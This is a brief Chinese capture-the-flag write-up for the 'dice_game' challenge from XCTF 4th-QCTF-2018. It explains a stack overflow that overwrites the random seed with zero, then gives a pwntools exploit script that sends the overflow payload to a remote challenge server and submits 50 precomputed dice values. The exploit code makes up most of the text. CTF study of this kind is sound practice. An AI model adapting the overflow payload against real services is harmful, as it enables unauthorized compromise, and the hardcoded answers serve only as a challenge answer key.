dice_game
题目来源: XCTF 4th-QCTF-2018
题目描述:暂无
首先利用栈溢出漏洞将seed覆盖为0,这样随机过程就确定下来了,然后写一个c程序把rand结果弄出来输入进去就好了
exp如下:
from pwn import * #io = gdb.debug('./dice_game', 'b *$rebase(0xB99)') #io = process('./dice_game') io = remote('111.200.241.244', 63482) io.recvuntil('Welcome, let me know your name: ') payload = b'a' * 64 + p64(0) io.send(payload) game_ans = [2, 5, 4, 2, 6, 2, 5, 1, 4, 2, 3, 2, 3, 2, 6, 5, 1, 1, 5, 5, 6, 3, 4, 4, 3, 3, 3, 2, 2, 2, 6, 1, 1, 1, 6, 4, 2, 5, 2, 5, 4, 4, 4, 6, 3, 2, 3, 3, 6, 1] for i in range(50): io.recvuntil('Give me the point(1~6): ') io.sendline(str(game_ans[i])) io.interactive()